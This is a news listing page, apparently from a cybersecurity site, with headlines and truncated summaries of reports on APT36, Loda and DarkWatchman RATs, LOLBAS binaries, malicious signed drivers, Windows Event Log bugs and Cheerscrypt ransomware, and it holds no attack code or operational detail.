APT36 Using Customized Malware to Attack Indian Government Linux and Windows Servers
APT36 is a highly sophisticated APT (Advanced Persistent Threat) group that is known for conducting targeted espionage in South Asia and is strongly linked to Pakistan.
While this APT group is known for targeting the...
OriginBotnet Attack Windows Machine Using Weaponized Word Document
A recent cyberattack effort was discovered that used a malicious Word document delivered via phishing emails, causing victims to download a loader that launched a succession of malware payloads.
OriginBotnet, RedLine Clipper, and Agent Tesla...
Loda Malware Attack Windows To Control RDP, Spread Malware, And Log User Inputs
Threat actors have been actively employing Loda, a remote access trojan (RAT) developed in AutoIT, an accessible language for automating Windows computer scripting.
The malware may deliver various harmful payloads in addition to keylogging, taking...
Hackers Abuse Windows Container Isolation Framework to Bypass Security Defences
Recently, cybersecurity researchers at Deep Instinct have asserted that hackers can exploit the Windows container isolation framework to bypass the security defenses and mechanisms of organizations.
Containers revolutionize the way applications are packaged and isolated,...
Researchers Discover 12 New LOLBAS Binaries that are Used by Attackers
Hackers actively leverage LOLBAS (Living-Off-the-Land Binaries-And-Scripts), it's a popular methodology that is used by threat actors for exploiting legit tools for hiding the illicit actions performed by them.
Since LOLBAS gaining traction at a rapid...
Beware! DarkWatchMan RAT Hides in Windows Registry
A phishing website impersonating the popular Russian site CryptoPro CSP has been detected by the Cyble Research and Intelligence Labs (CRIL) in a recent discovery.
The distribution of DarkWatchman malware was being carried out by...
Hackers Using Microsoft-signed Malicious Windows Drivers in Ransomware Attacks
Following a series of cyberattacks, including ransomware attacks, Microsoft recently revoked several Microsoft hardware developer accounts.
In a coordinated disclosure, the news came from the following entities:-
Microsoft
Mandiant
Sophos
SentinelOne
Authenticode signatures from Microsoft's Windows Hardware Developer Program have...
Easy Way to Fix Windows Security Not Opening in Windows
Windows Security Center is one of the most popular and trusted products from Microsoft. This product allows you to protect your PC from malware and other threats. However, some users may experience some performance...
Windows Event Log Bugs let Hackers Perform DOS & Remotely Crash Event Log Apps
It was revealed recently by security researchers at Varonis Threat Labs, that Microsoft Windows contains two vulnerabilities in Event logs, one of which can be exploited in order to cause a Denial of Service...
Cheerscrypt Linux-based Ransomware Encrypt Both Linux & Windows Systems
In a recent investigation, the Sygnia security firm found Linux-based ransomware, Cheerscrypt. This ransomware was found using the TTPs of Night Sky ransomware.
There is a common threat group called Emperor Dragonfly (A.K.A. DEV-0401/BRONZE STARLIGHT)...